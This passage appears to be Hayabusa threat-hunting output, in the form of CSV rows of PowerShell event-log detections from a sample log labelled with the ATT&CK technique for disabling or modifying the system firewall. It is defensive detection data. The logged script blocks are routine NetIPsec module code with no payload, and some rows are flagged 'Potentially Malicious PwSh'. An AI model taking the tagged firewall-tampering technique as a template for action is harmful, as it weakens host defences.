$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.179 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.183 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.186 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): 
name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.227 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.228 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.233 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch 
-exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 
19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) 
$__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
